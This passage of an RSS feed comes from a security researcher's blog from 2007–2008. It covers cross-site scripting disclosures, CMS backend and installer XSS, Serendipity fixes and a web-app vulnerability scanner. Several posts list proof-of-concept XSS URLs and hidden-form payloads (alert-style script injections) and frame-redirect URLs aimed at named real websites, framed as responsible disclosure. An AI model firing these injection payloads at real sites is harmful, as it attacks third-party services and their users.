I&#039;ve replaced the forwarding URL and the advertising words (cause I don&#039;t want to raise interest on spammers pages). I got several similar spam comments the following days all with the same scheme. Using a Cross Site Scripting vulnerability, mostly on pages that might raise trust to forward to a medical selling page.&lt;br /&gt;
&lt;br /&gt;
This is probably a good reason why XSS should be fixed, no matter what attack vectors there are. It can always be used by spammers to use your pages fame / authority to advertise their services. Same goes for redirectors or frame injections. Some where already reported at some public place (for the above see &lt;a href=&quot;http://xssed.com/mirror/34360/&quot;&gt;here&lt;/a&gt;). I&#039;ve re-reported them all, but got just one reply by a webmaster who fixed it. True reality on the internet today, even webmasters of famous public organizations don&#039;t seem to care about internet security.&lt;br /&gt;
&lt;br /&gt;
For the record, the others:&lt;br /&gt;
http://adventisthealth.org/utilities/search.asp?Yider=&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.loc.gov/rr/ElectronicResources/search.php?search_term=&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
And thanks to &lt;a href=&quot;http://iconfactory.com/&quot;&gt;iconfactory&lt;/a&gt;, they fixed &lt;a href=&quot;http://xssed.com/mirror/8360/&quot;&gt;their XSS&lt;/a&gt;. 
    </content:encoded>

    <pubDate>Thu, 27 Mar 2008 13:15:18 +0100</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/603-guid.html</guid>
    <category>security</category>
<category>spam</category>
<category>unicef</category>
<category>websecurity</category>
<category>xss</category>

</item>
<item>
    <title>Cross Site Scripting (XSS) in the backend and in the installer</title>
    <link>https://blog.hboeck.de/archives/591-Cross-Site-Scripting-XSS-in-the-backend-and-in-the-installer.html</link>
            <category>English</category>
            <category>Security</category>
            <category>Webdesign</category>
    
    <comments>https://blog.hboeck.de/archives/591-Cross-Site-Scripting-XSS-in-the-backend-and-in-the-installer.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=591</wfw:comment>

    <slash:comments>1</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=591</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    I want to give some thoughts about some more advanced XSS-issues based on two vulnerability announcements I recently made.&lt;br /&gt;
&lt;br /&gt;
First is backend XSS. I think this hasn&#039;t been adressed very much, most probably all CMS have this issue. If you have a CMS-System (a blog is also a CMS system in this case) with multiple users, there are various ways where users can XSS each other. The most obvious one is that it&#039;s common practice that a CMS gives you some way to publish raw html content.&lt;br /&gt;
&lt;br /&gt;
Assuming you have a blog where multiple users are allowed to write articles. Alice writes an article, Eve doesn&#039;t like the content of that article. Eve can now write another article with some JavaScript adjusted to steal Alice&#039;s cookie. As soon as Alice is logged in and watches the frontpage with Eve&#039;s article, her cookie get&#039;s stolen, Eve can hijack her account and manipulate her articles.&lt;br /&gt;
&lt;br /&gt;
Solution is not that simple. To prevent the XSS, you&#039;d have to make sure that there&#039;s absolutely no way to put raw html code on the page. Serendipity for example has a plugin called trustxss which should do exactly that, though there are many ways to circumvent that (at least all I found should be fixed in &lt;a href=&quot;http://blog.s9y.org/archives/191-Serendipity-1.3-beta1-released.html&quot;&gt;1.3-beta1&lt;/a&gt;, see advisory here: &lt;a href=&quot;http://int21.de/cve/CVE-2008-0124-s9y.html&quot;&gt;CVE-2008-0124&lt;/a&gt;). All fields like username, user-information etc. need to be escaped and it should be the default that users aren&#039;t allowed to post html. If a superuser enables html-posting for another user, he should be warned about the security implications.&lt;br /&gt;
&lt;br /&gt;
A quite different way would be separating front- and backend on different domains. I don&#039;t know of any popular CMS currently doing that, but it would prevent a lot of vulnerabilities: The website content is, e.g., located on www.mydomain.com, while the backend is on edit.mydomain.com. It would add complexity to the application setup, especially on shared hosting environments.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Second issue is XSS/CSRF in the installer. I&#039;m not really sure how I should classify these, as an open installer most probably has more security implications than just XSS. I recently discovered an XSS in the installer of moodle (&lt;a href=&quot;http://int21.de/cve/CVE-2008-0123-moodle.html&quot;&gt;CVE-2008-0123&lt;/a&gt;) which made me think about this.&lt;br /&gt;
&lt;br /&gt;
I thought of a (real) scenario where I was sitting in a room with a group, discussing that we need a webpage, we would take Domain somedomain.de and install some webapp (in this case MediaWiki, but there I found no such issues) there. I suddenly started implementing that with my laptop. Other people in the room hearing the discussion could send me links to trigger some kind of XSS/CSRF there. This probably isn&#039;t a very likely scenario, but still, I&#039;d suggest to prevent XSS/CSRF also in the installer of web applications. 
    </content:encoded>

    <pubDate>Tue, 26 Feb 2008 14:23:59 +0100</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/591-guid.html</guid>
    <category>csrf</category>
<category>english</category>
<category>moodle</category>
<category>s9y</category>
<category>security</category>
<category>serendipity</category>
<category>websecurity</category>
<category>xss</category>

</item>
<item>
    <title>Some XSS issues in Serendipity found</title>
    <link>https://blog.hboeck.de/archives/572-Some-XSS-issues-in-Serendipity-found.html</link>
            <category>Code</category>
            <category>Security</category>
    
    <comments>https://blog.hboeck.de/archives/572-Some-XSS-issues-in-Serendipity-found.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=572</wfw:comment>

    <slash:comments>5</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=572</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    I recently stepped upon some XSS issues in Serendipity.&lt;br /&gt;
&lt;br /&gt;
The first is in the remoterss-plugin, which can be used to display the content of an RSS feed in the sidebar of a blog. It didn&#039;t escape links, so JavaScript-Code could be injected by malicious RSS feeds. This plugin is shipped with the base version of S9Y. They&#039;ve released 1.2.1 this weekend which has the fix.&lt;br /&gt;
If you&#039;re using the remoterss plugin, you should upgrade to 1.2.1 as soon as possible. This issue is named &lt;a href=&quot;http://www.int21.de/cve/CVE-2007-6205-s9y.html&quot;&gt;CVE-2007-6205&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
The other one is in the external mycalendar-plugin. It also allows unescaped content inside links. This wouldn&#039;t be a real issue, as this form should only be accessible by the blog administrator. But the form had no CSRF (Cross-Site-Request-Forgery) protection, so an attacker could trigger this form and thus inject javascript on the blog-page. This has been fixed within version 0.13 of the plugin, so if you&#039;re using it, please upgrade. CVE-2007-6390 now assigned.&lt;br /&gt;
&lt;br /&gt;
Beside I&#039;d like to note that I got fast replies to my reports and the s9y devs fixed them quite quickly. Thanks for that! 
    </content:encoded>

    <pubDate>Mon, 10 Dec 2007 14:48:13 +0100</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/572-guid.html</guid>
    <category>blog</category>
<category>s9y</category>
<category>security</category>
<category>serendipity</category>
<category>websecurity</category>
<category>xss</category>

</item>
<item>
    <title>freewvs released</title>
    <link>https://blog.hboeck.de/archives/553-freewvs-released.html</link>
            <category>Code</category>
            <category>English</category>
            <category>Linux</category>
            <category>Security</category>
    
    <comments>https://blog.hboeck.de/archives/553-freewvs-released.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=553</wfw:comment>

    <slash:comments>3</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=553</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    One of the biggest threats in computer security today are web applications. There&#039;s a vast number of issues found in popular web apps, mostly cross site scripting, cross site request forgery and sql injection. For a long time I had the idea of a tool scanning through webroots and looking for popular web applications, comparing them with a database of their latest security issues. In the past weeks, I finaly managed to get some code done.&lt;br /&gt;
&lt;br /&gt;
It&#039;s a quite simple python-script (don&#039;t cry about the source quality, I haven&#039;t done real coding for ages), together with a database of some popular applications. I&#039;m looking forward to hear feedback. The usage is simple, just do something like this:&lt;br /&gt;
&lt;b&gt;freewvs /home/joe/websites/foo /home/guest/websites/bar&lt;/b&gt;&lt;br /&gt;
Typical output looks like this:&lt;br /&gt;
&lt;i&gt;WebsiteBaker 2.4.3 (2.6.5) CVE-2007-0527 /home/hanno/freewvs/test/websitebaker&lt;br /&gt;
Drupal 5.1 (5.3) CVE-2007-5416 /home/hanno/freewvs/test/drupal&lt;br /&gt;
PhpWebGallery 1.5.1 () CVE-2007-5012 /home/hanno/freewvs/test/phpwebgallery&lt;/i&gt;&lt;br /&gt;
Mostly self explaining. The found app at the beginning, the version where the issue was fixed in brackets, the CVE-ID (or some other vulnerability id, in doubt an URL) and the path.&lt;br /&gt;
&lt;br /&gt;
The biggest work to do is probably to get more applications added to the database and to keep the database updated. It&#039;s format is pretty self-explaining, so I&#039;m waiting for your patches.&lt;br /&gt;
&lt;br /&gt;
Get it here: &lt;a href=&quot;https://freewvs.schokokeks.org/&quot;&gt;https://freewvs.schokokeks.org/&lt;/a&gt; 
    </content:encoded>

    <pubDate>Thu, 18 Oct 2007 19:04:00 +0200</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/553-guid.html</guid>
    <category>code</category>
<category>csrf</category>
<category>freesoftware</category>
<category>freewvs</category>
<category>security</category>
<category>web</category>
<category>xss</category>

</item>
<item>
    <title>More XSS</title>
    <link>https://blog.hboeck.de/archives/511-More-XSS.html</link>
            <category>English</category>
            <category>Security</category>
            <category>Webdesign</category>
    
    <comments>https://blog.hboeck.de/archives/511-More-XSS.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=511</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=511</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    I thought I&#039;d give you some more (all have been informed months ago):&lt;br /&gt;
&lt;br /&gt;
http://thepiratebay.org/search/&quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.gruene.de/cms/default/dok/144/144640.dokumentsuche.htm?execute=1&amp;amp;suche_voll_starten=1&amp;amp;volltext_suchbegriff=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.terions.de/index_whois.php?ddomain=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.eselfilme.com/newsletter/newsletter.php?action=sign&amp;amp;email=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.region-stuttgart.de/sixcms/rs_suche/?_suche=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://reports.internic.net/cgi/whois?whois_nic=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&amp;amp;type=domain 
    </content:encoded>

    <pubDate>Fri, 13 Jul 2007 04:28:36 +0200</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/511-guid.html</guid>
    <category>javascript</category>
<category>security</category>
<category>websecurity</category>
<category>xss</category>

</item>
<item>
    <title>XSS on helma/gobi</title>
    <link>https://blog.hboeck.de/archives/510-XSS-on-helmagobi.html</link>
            <category>English</category>
            <category>Security</category>
            <category>Webdesign</category>
    
    <comments>https://blog.hboeck.de/archives/510-XSS-on-helmagobi.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=510</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=510</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    I still have some unresolved xss vulnerabilities around. It seems to be common practice by many web application developers and web designers to ignore such information.&lt;br /&gt;
&lt;br /&gt;
This time we have gobi, a cms system based on the quite popular javascript application server helma.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://int21.de/cve/CVE-2007-3693-gobi.txt&quot;&gt;http://int21.de/cve/CVE-2007-3693-gobi.txt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
More to come. As this xss stuff is far too easy (try some common strings in web forms, inform the author, publish some weeks later), I think about doing some kind of automated mechanism to search and report those vulnerabilities. 
    </content:encoded>

    <pubDate>Thu, 12 Jul 2007 00:44:29 +0200</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/510-guid.html</guid>
    <category>cve</category>
<category>gobi</category>
<category>helma</category>
<category>javascript</category>
<category>security</category>
<category>web</category>
<category>xss</category>

</item>
<item>
    <title>Cross site scripting in mephisto blog, toendaCMS and chcounter</title>
    <link>https://blog.hboeck.de/archives/471-Cross-site-scripting-in-mephisto-blog,-toendaCMS-and-chcounter.html</link>
            <category>Code</category>
            <category>English</category>
            <category>Security</category>
    
    <comments>https://blog.hboeck.de/archives/471-Cross-site-scripting-in-mephisto-blog,-toendaCMS-and-chcounter.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=471</wfw:comment>

    <slash:comments>2</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=471</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    Now, once another episode of cross site scripting disclosure. This time we have some free software web applications. Sadly, none of them was able to provide a fix in a decent timeframe.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://int21.de/cve/CVE-2007-1871-chcounter.txt&quot;&gt;CVE-2007-1871 XSS in chcounter&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://int21.de/cve/CVE-2007-1872-toendacms.txt&quot;&gt;CVE-2007-1872 XSS in toendaCMS&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://int21.de/cve/CVE-2007-1873-mephisto.txt&quot;&gt;CVE-2007-1873 XSS in mephisto&lt;/a&gt; 
    </content:encoded>

    <pubDate>Thu, 12 Apr 2007 01:35:01 +0200</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/471-guid.html</guid>
    <category>chcounter</category>
<category>mephisto</category>
<category>security</category>
<category>toendacms</category>
<category>xss</category>

</item>
<item>
    <title>Cross Site Scripting all over the internet</title>
    <link>https://blog.hboeck.de/archives/468-Cross-Site-Scripting-all-over-the-internet.html</link>
            <category>English</category>
            <category>Security</category>
            <category>Webdesign</category>
    
    <comments>https://blog.hboeck.de/archives/468-Cross-Site-Scripting-all-over-the-internet.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=468</wfw:comment>

    <slash:comments>2</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=468</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    It&#039;s terrifying how many sites there are out there with XSS-issues.&lt;br /&gt;
&lt;br /&gt;
http://www.netbeat.de/bestellen/domaincheck.html?&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.netbeat.de/support/kommentare.html?name=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.symlink.ch/users.pl?unickname=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.stuttgart.de/sde/search.php?search=%22&amp;gt;&amp;lt;script&amp;gt;alert%281%29&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.holidayranking.de/search.html?searchSearchString=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.freecity.de/suche/index.phtml?gosearch=yes&amp;amp;words=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://search.netdoktor.com/results.html?qt=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&amp;amp;la=de&lt;br /&gt;
http://www.vfb.de/de/suche/index.php?words=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;form method=&quot;post&quot; action=&quot;http://www.adac.de/Search/SearchResult/RW_SearchResult.asp&quot;&gt;&lt;div&gt;&lt;input type=&quot;hidden&quot; name=&quot;RWQuery&quot; value=&#039;&quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&#039;/&gt;&lt;input type=&quot;submit&quot; value=&quot;adac.de&quot;/&gt;&lt;/div&gt;&lt;/form&gt;&lt;form method=&quot;post&quot; action=&quot;http://www.tu-berlin.de/www/software/java/cgi-bin/search.pl&quot;&gt;&lt;div&gt;&lt;input type=&quot;hidden&quot; name=&quot;terms&quot; value=&#039;&quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&#039;/&gt;&lt;input type=&quot;submit&quot; value=&quot;hoax-info.de&quot;/&gt;&lt;/div&gt;&lt;/form&gt;&lt;br /&gt;
Note: All have been informed more than a week ago. I also had a bunch of others that got fixed after notification of the webmasters.&lt;br /&gt;
&lt;br /&gt;
Napster and MPAA still unfixed. 
    </content:encoded>

    <pubDate>Fri, 30 Mar 2007 14:58:28 +0200</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/468-guid.html</guid>
    <category>security</category>
<category>web</category>
<category>xss</category>

</item>
<item>
    <title>Liegt bestimmt an der Firewall</title>
    <link>https://blog.hboeck.de/archives/463-Liegt-bestimmt-an-der-Firewall.html</link>
            <category>Code</category>
            <category>Computer culture</category>
            <category>Security</category>
            <category>Webdesign</category>
    
    <comments>https://blog.hboeck.de/archives/463-Liegt-bestimmt-an-der-Firewall.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=463</wfw:comment>

    <slash:comments>5</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=463</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    Folgende Nachricht schrieb ich an den Support von Napster (das ist dieser DRM-Shop, hervorgegangen aus dem Label eines längst vergessenen Projekts):&lt;br /&gt;
&lt;div class=&quot;box&quot;&gt;Die Suche auf napster.de ist anfällig für eine Cross Site Scripting Attacke:&lt;br /&gt;
http://www.napster.de/search_music.html?op=search&amp;amp;artist_name=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;/div&gt;&lt;br /&gt;
Folgende, überaus kompetente Antwort erhielt ich:&lt;br /&gt;
&lt;div class=&quot;box&quot;&gt;Diese Meldung erscheint, wenn Sie ein Anti-Virus Programm oder die Firewall aktiviert haben. Bitte, erlauben Sie Napster in dem betreffenden Programm.&lt;/div&gt; 
    </content:encoded>

    <pubDate>Tue, 20 Mar 2007 22:47:09 +0100</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/463-guid.html</guid>
    <category>firewall</category>
<category>napster</category>
<category>security</category>
<category>support</category>
<category>xss</category>

</item>
<item>
    <title>XSS der Woche</title>
    <link>https://blog.hboeck.de/archives/460-XSS-der-Woche.html</link>
            <category>Copyright</category>
            <category>Movies</category>
            <category>Security</category>
            <category>Webdesign</category>
    
    <comments>https://blog.hboeck.de/archives/460-XSS-der-Woche.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=460</wfw:comment>

    <slash:comments>3</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=460</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    Ich wusste doch immer dass die von der Filmindustrie das mit dem Internetz nicht verstanden haben:&lt;br /&gt;
&lt;br /&gt;
&lt;form action=&quot;http://www.mpaa.org/FlmRat_SrchReslts.asp&quot; method=&quot;post&quot;&gt;&lt;p&gt;&lt;input type=&quot;hidden&quot; name=&quot;txtsearch&quot; value=&quot;&#039;;alert(&#039;muslix64 rulz!&#039;);var a=&#039;&quot;/&gt;&lt;input type=&quot;submit&quot; value=&quot;Ok&quot;/&gt;&lt;/p&gt;&lt;/form&gt; 
    </content:encoded>

    <pubDate>Thu, 15 Mar 2007 00:43:03 +0100</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/460-guid.html</guid>
    <category>javascript</category>
<category>mpaa</category>
<category>security</category>
<category>xss</category>

</item>
<item>
    <title>XSS on eplus.de</title>
    <link>https://blog.hboeck.de/archives/458-XSS-on-eplus.de.html</link>
            <category>Code</category>
            <category>English</category>
            <category>Security</category>
            <category>Webdesign</category>
    
    <comments>https://blog.hboeck.de/archives/458-XSS-on-eplus.de.html#comments</comments>
    <wfw:comment>https://blog.hboeck.de/wfwcomment.php?cid=458</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>https://blog.hboeck.de/rss.php?version=2.0&amp;type=comments&amp;cid=458</wfw:commentRss>
    

    <author>nospam@example.com (Hanno Böck)</author>
    <content:encoded>
    Note: This is just a short form of &lt;a href=&quot;https://blog.hboeck.de/archives/457-XSS-fuer-Einsteiger-Spass-mit-eplus.de.html&quot;&gt;a german article I posted today&lt;/a&gt;. E-Plus is a big german mobile telephony provider. I&#039;ve found a bunch of XSS together with &lt;a href=&quot;http://www.bitsploit.de/&quot;&gt;Alexander Brachmann&lt;/a&gt; (responsible disclosure, all reported to E-Plus before, probably more to come).&lt;br /&gt;
&lt;br /&gt;
For my english visitors, here are the urls:&lt;br /&gt;
&lt;i&gt;http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort=&quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;http://www.eplus.de/frame.asp?go=http://www.eplus.de/&#039;);alert(1);document.write(&#039;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;http://www.eplus.de/frame.asp?go=&#039;);alert(&#039;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
Already fixed ones:&lt;br /&gt;
&lt;i&gt;http://www.eplus.de/frame.asp?go=http://www.google.de/&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com&lt;/i&gt; 
    </content:encoded>

    <pubDate>Mon, 12 Mar 2007 19:09:19 +0100</pubDate>
    <guid isPermaLink="false">https://blog.hboeck.de/archives/458-guid.html</guid>
    <category>eplus</category>
<category>phishing</category>
<category>security</category>
<category>web</category>
<category>xss</category>

</item>

</channel>
</rss>
